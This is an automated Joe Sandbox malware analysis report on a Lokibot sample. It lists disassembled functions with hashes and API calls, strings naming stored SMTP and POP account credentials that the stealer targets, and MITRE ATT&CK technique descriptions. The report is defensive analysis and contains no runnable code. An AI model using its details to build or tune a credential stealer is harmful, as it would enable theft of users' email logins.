Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4d60000_VvtddClQv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee51bc9f6ead624ede28b207eb282274890da724f47323fc312d47727522c9ab
Instruction ID: 5bcafe1e3b5aeb42a811c2e3b5f33d94794973c1f55f91933511a3dd0b5c2cfe
Opcode Fuzzy Hash: ee51bc9f6ead624ede28b207eb282274890da724f47323fc312d47727522c9ab
Instruction Fuzzy Hash: 0EE092B094462BCFDB60DF64DC94BADBBB1BB45300F0055EA851AAB290EB701A89CF55

Function 04D62FB0 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1822793486.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4d60000_VvtddClQv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 614242f9da63b4a2877a3012f6da6b65e85c00493a3a79de07f8e08f786f1754
Instruction ID: 1e12236547e94265303fdc8f78b6aa1c61e9bba36fe0ffc252733ba2b68608ba
Opcode Fuzzy Hash: 614242f9da63b4a2877a3012f6da6b65e85c00493a3a79de07f8e08f786f1754
Instruction Fuzzy Hash: 4FE06775A40209DFD740DF65E5A9AAEBBB0EF0C314F24845AE816F7761CB74A848CF50

Function 04D67451 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1822793486.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4d60000_VvtddClQv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 794dd8c729674652e0d7470493874e27960afb1eca63f0485cfdc2e05663d41f
Instruction ID: 9dd0deb6dd3a236bae70b283b48267358911915b34e5115e8588a24fe07e05ed
Opcode Fuzzy Hash: 794dd8c729674652e0d7470493874e27960afb1eca63f0485cfdc2e05663d41f
Instruction Fuzzy Hash: 1CC04C2114A7959FC313875289345C13FB1AD0755474A04D6D4D2CB6A7D7194809D7A1

Function 04D668E0 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1822793486.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4d60000_VvtddClQv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e240cf217069b5810f13aec3208ae2b984452b747e21f33a881c4b4f1e8239f
Instruction ID: 809564760dc30a5dceecfddbcf7829c6c317a5c984488195c81cf29d5941ee7b
Opcode Fuzzy Hash: 7e240cf217069b5810f13aec3208ae2b984452b747e21f33a881c4b4f1e8239f
Instruction Fuzzy Hash: A0C00232144108BBDB027A81E811E59BF2AAB55694F548055FB040D161D673E562ABA0

Function 04D68E81 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1822793486.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4d60000_VvtddClQv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a5afeed1ce70e74abd2d9666ee0c7661302cf717c703406173e7d5edb2bdca7
Instruction ID: 639555b3b8466967089f4031a5affc7e9242cd9b362e94fc947d9b1902ac5144
Opcode Fuzzy Hash: 5a5afeed1ce70e74abd2d9666ee0c7661302cf717c703406173e7d5edb2bdca7
Instruction Fuzzy Hash: 5DC09B5850E3D49FC60386111C3C2553F71DD4245434D05C644C1CB1EBD5194C5E87A5

Function 04FBC34C Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1823119163.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4fb0000_VvtddClQv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 283f59ab15d732fd488a323496f84466ec8d1de6e42fd952f1fcd74ef028465b
Instruction ID: 7cedf9ad50e2828f0cac68b3e898f09f24dd7c20215c779e2dee6c2cfa97ea19
Opcode Fuzzy Hash: 283f59ab15d732fd488a323496f84466ec8d1de6e42fd952f1fcd74ef028465b
Instruction Fuzzy Hash: ADB0926A259340E67800A2A59C50AAB6420BBA6B08B449C1522CA600108920B426A26B

Analysis Process: VvtddClQv.exePID: 4780, Parent PID: 3788COMMON

Execution Graph

Execution Coverage:	3.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.3%
Total number of Nodes:	302
Total number of Limit Nodes:	13

Executed Functions

Function 00413866 Relevance: 4.6, APIs: 3, Instructions: 147
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
GetLastError.KERNEL32 ref: 0041399E

Memory Dump Source

Source File: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_VvtddClQv.jbxd

Yara matches

Similarity

API ID: Error$CreateLastModeMutex
String ID:
API String ID: 3448925889-0
Opcode ID: 24802840a9e80e41c8200fa87372d6a1c573b20100aacb3c492bf68185cebf66
Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
Opcode Fuzzy Hash: 24802840a9e80e41c8200fa87372d6a1c573b20100aacb3c492bf68185cebf66
Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E

Function 00404A52 Relevance: 3.1, APIs: 2, Instructions: 63
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: HeapAlloc.KERNEL32(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC

Memory Dump Source

Source File: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_VvtddClQv.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID:
API String ID: 3676486918-0
Opcode ID: df5e51209e30d87507a4750a0631f6435c2f152f95c8b1de61f5c825813b11bc
Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
Opcode Fuzzy Hash: df5e51209e30d87507a4750a0631f6435c2f152f95c8b1de61f5c825813b11bc
Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9

Function 00404DF3 Relevance: 1.5, APIs: 1, Instructions: 13
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000202,?), ref: 00404E08

Memory Dump Source

Source File: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_VvtddClQv.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2

Function 00402C1F Relevance: 1.5, APIs: 1, Instructions: 12
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34

Memory Dump Source

Source File: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_VvtddClQv.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 1e00aa432103c00395cacdadc05548eaee9b0074d701dd53c2a9d16b249f06e7
Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
Opcode Fuzzy Hash: 1e00aa432103c00395cacdadc05548eaee9b0074d701dd53c2a9d16b249f06e7
Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5

Function 00413A3F Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(00000000,00000000,E567384D,00000000,00000000,?,00413B8D,00000000,?,?,004139CC,00000000), ref: 00413A54

Memory Dump Source

Source File: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_VvtddClQv.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 28892627b4184eb34835cb905e0569b311a61ada9086cb921d1e57989bacd3e5
Instruction ID: a51fc36abc950c8e07eb8ba8f8e19e2949325f4e0a3e122df0d5a7568418e784
Opcode Fuzzy Hash: 28892627b4184eb34835cb905e0569b311a61ada9086cb921d1e57989bacd3e5
Instruction Fuzzy Hash: 52B092B11042087EAA402EF19C05D3B3A4DCA44508B0044357C08E5422E936EE2050A4

Function 004049FF Relevance: 1.5, APIs: 1, Instructions: 11
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15

Memory Dump Source

Source File: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_VvtddClQv.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: fd13a4ababa05b6dfa8c376aed1a70cd2f6ce4ef8af563d78b915090b99271a8
Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
Opcode Fuzzy Hash: fd13a4ababa05b6dfa8c376aed1a70cd2f6ce4ef8af563d78b915090b99271a8
Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099

Non-executed Functions

Function 0040434D Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040438F
CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
VariantInit.OLEAUT32(?), ref: 004043C4
SysAllocString.OLEAUT32(?), ref: 004043CD
VariantInit.OLEAUT32(?), ref: 00404414
SysAllocString.OLEAUT32(?), ref: 00404419
VariantInit.OLEAUT32(?), ref: 00404431

Memory Dump Source

Source File: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_VvtddClQv.jbxd

Yara matches

Similarity

API ID: InitVariant$AllocString$CreateInitializeInstance
String ID:
API String ID: 1312198159-0
Opcode ID: 513fbf6384ec98fcae1358c4661a671bc025351e7b653efb5643f1f3667a8473
Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
Opcode Fuzzy Hash: 513fbf6384ec98fcae1358c4661a671bc025351e7b653efb5643f1f3667a8473
Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94

Function 0040D069 Relevance: 12.6, Strings: 10, Instructions: 138COMMON

Download Yara Rule

Strings

SmtpAccount, xrefs: 0040D0FA
Technology, xrefs: 0040D08D
SmtpServer, xrefs: 0040D0DC
EmailAddress, xrefs: 0040D074
SmtpPassword, xrefs: 0040D117
PopPassword, xrefs: 0040D0D0
SmtpPort, xrefs: 0040D0EB
PopServer, xrefs: 0040D099
PopPort, xrefs: 0040D0A7
PopAccount, xrefs: 0040D0B6

Memory Dump Source

Source File: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_VvtddClQv.jbxd

Yara matches

Similarity

API ID:
String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
API String ID: 0-2111798378
Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48

Function 00402B7C Relevance: 2.5, APIs: 2, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
HeapAlloc.KERNEL32(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

Memory Dump Source

Source File: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_VvtddClQv.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9

Function 00404ED4 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2

Memory Dump Source

Source File: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_VvtddClQv.jbxd

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88

Function 0040317B Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_VvtddClQv.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64

Function 004061C3 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 151COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
_wmemset.LIBCMT ref: 00406244
_wmemset.LIBCMT ref: 00406261

Strings

IDA, xrefs: 004061E5, 00406276, 004062AC, 0040621D, 004061E8, 00406220, 0040628B
IDA, xrefs: 00406304

Memory Dump Source

Source File: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_VvtddClQv.jbxd

Yara matches

Similarity

API ID: _wmemset$ErrorLast
String ID: IDA$IDA
API String ID: 887189805-2020647798
Opcode ID: d1a4e7134676979b6b57f8278ca938aa0c19887f4db682e2a4dd920a4280672c
Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
Opcode Fuzzy Hash: d1a4e7134676979b6b57f8278ca938aa0c19887f4db682e2a4dd920a4280672c
Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

Function 00404E17 Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
socket.WS2_32(?,?,?), ref: 00404E7A
freeaddrinfo.WS2_32(00000000), ref: 00404E90

Memory Dump Source

Source File: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_VvtddClQv.jbxd

Yara matches

Similarity

API ID: freeaddrinfogetaddrinfosocket
String ID:
API String ID: 2479546573-0
Opcode ID: 3e5dcc4db61406608786f9b0aa712dad600a8c5e5b05f0ce84802de4921d3fb8
Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
Opcode Fuzzy Hash: 3e5dcc4db61406608786f9b0aa712dad600a8c5e5b05f0ce84802de4921d3fb8
Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PO-0Y9005373R664.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Lokibot

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO-0Y9005373R664.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\VvtddClQv.exe.log

